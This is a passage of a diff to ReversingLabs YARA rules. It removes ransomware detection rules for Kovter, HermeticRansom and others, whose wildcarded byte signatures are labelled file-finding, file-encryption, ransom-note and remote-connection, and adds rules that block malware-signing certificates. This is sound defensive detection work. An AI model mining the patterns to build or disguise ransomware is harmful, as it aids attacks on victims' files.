?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 2A - } - $find_files_p2 = { - 73 ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1B 28 ?? ?? ?? ?? 6F ?? ?? ?? - ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F - ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A - } - $change_desktop = { - 1F ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 28 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 17 - 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 1F ?? 16 - 06 19 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A - } - $drop_ransom_note = { - 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 2A 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 02 7B ?? ?? - ?? ?? 6F ?? ?? ?? ?? 0D 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? - ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 26 07 6F ?? - ?? ?? ?? 26 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? - 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 07 11 ?? 6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? - DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07 6F ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ?? - ?? ?? 06 28 ?? ?? ?? ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? DE ?? - 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26 - DE ?? 2A - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($change_desktop) and ($drop_ransom_note) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT,LLC" and (pe.signatures[i].serial=="00:98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d" or pe.signatures[i].serial=="98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d") and 1656547200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Kovter : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4631713E66E91347F0388B98Cf747794 : INFO FILE { meta: - description = "Yara rule that detects Kovter ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9362ac5a-0b6c-5ac5-ac2b-59dcc1191dc6" - date = "2020-07-15" - modified = "2020-07-15" + id = "6c541522-98ab-5acb-af84-c005c9721e1f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Kovter.yara#L1-L141" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3082e036b54a73ce8397cfa6e8dc2a807c587d9f17286e75af6cdbe622fae1e1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12462-L12478" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cb517cda67150b7e17ee3bd946903e8e8eca81742a362032249a2f2387e71c50" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Kovter" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D - ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? - 89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 8B 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? - E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 A1 ?? ?? ?? ?? 80 38 ?? 74 - ?? 8B CE 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 - 89 45 ?? 33 C0 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 48 75 ?? B3 ?? 8D 45 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? - ?? ?? ?? 5A 2B C2 83 C0 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ?? - 8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D - 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? - 8B D0 42 8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ?? - E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ?? - 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? - ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 - ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D - } - $remote_connection_2 = { - 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0D ?? ?? - ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A - ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 - ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? - ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? - 83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 - ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? - 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF - 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? - ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D - 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 - ?? 0D ?? ?? ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 - E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? - ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? - ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? - ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B - 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ?? - ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? - ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A - ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 - 85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? - ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8B 45 - ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B - } - $remote_connection_3 = { - 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? - ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ?? - E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45 - ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? - 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 - ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? - ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? - ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B - 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? - ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 - ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B - 45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $find_files = { - 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87 - ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ?? F6 47 ?? ?? 0F 85 ?? ?? - ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ?? - 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 - ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83 - FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? - ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 - ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F - 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F - 84 ?? ?? ?? ?? F6 47 ?? ?? 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75 - ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 - ?? 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68 - ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0 - F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B DB F7 DB 84 DB - 75 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $decrypt_payload_script = { - FF 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF - 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 - ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? - ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8B C3 BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? FF 33 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF - 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? - ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF - 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? - ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D - 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 - } - condition: - uint16(0)==0x5A4D and $find_files and $decrypt_payload_script and ( all of ($remote_connection_*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\xB9\\xBF\\xE5\\xB7\\x9E\\xE6\\x98\\x8A\\xE5\\x8A\\xA8\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="46:31:71:3e:66:e9:13:47:f0:38:8b:98:cf:74:77:94" and 1488240000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Hermeticransom : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_E963F8983D21B4C1A69C66A9D37498E5 : INFO FILE { meta: - description = "Yara rule that detects HermeticRansom ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6aaf89f4-0cf8-5f0e-b89d-01ac7edd06c0" - date = "2022-05-13" - modified = "2022-05-13" + id = "4cbc6cc9-1795-5d43-84a1-dd835d7ef349" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.HermeticRansom.yara#L1-L105" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "123d569a9d9b9d855b3baafd6194f102d82a594fd7a2bba073843a8654a317cb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12480-L12498" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b7c715e28f003351d10ba53657e9e667b635a0e4433276d91d26f4482a61191d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "HermeticRansom" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $drop_ransom_note = { - 65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 3B 41 ?? - 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 0F 10 04 24 0F 11 44 24 ?? 0F 10 44 24 ?? 0F 11 44 24 ?? 0F 10 44 - 24 ?? 0F 11 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8D BC 24 ?? ?? ?? - ?? 48 8D 35 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 - 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? - ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? - ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 - 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? ?? - ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 14 24 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 - 8B 44 24 ?? 48 8B 4C 24 ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 14 24 48 89 4C 24 ?? 48 89 - 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 - ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 - 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0C 24 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C - 24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? - ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 - } - $encrypt_files_p1 = { - E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? - ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 89 14 24 - 48 89 74 24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ?? - ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 54 24 ?? E8 - ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 9C 24 ?? ?? ?? ?? 48 - 85 DB 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8D - 05 ?? ?? ?? ?? 48 89 04 24 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44 24 ?? 48 89 C1 48 C1 F8 ?? 48 - C1 E8 ?? 48 01 C8 48 C1 F8 ?? 48 89 84 24 ?? ?? ?? ?? 48 C1 E0 ?? 48 29 C1 48 89 4C - 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 04 24 0F 57 C0 0F - 11 44 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? B8 ?? ?? ?? ?? - 48 89 84 24 ?? ?? ?? ?? 31 C9 EB ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? - 48 39 C1 0F 8D ?? ?? ?? ?? 48 89 CA 48 C1 E1 ?? 48 FF C2 48 89 D3 48 C1 E2 ?? 48 39 - D1 0F 87 ?? ?? ?? ?? 48 8B 74 24 ?? 48 39 F2 0F 87 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? - ?? 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 89 3C 24 48 89 - } - $encrypt_files_p2 = { - 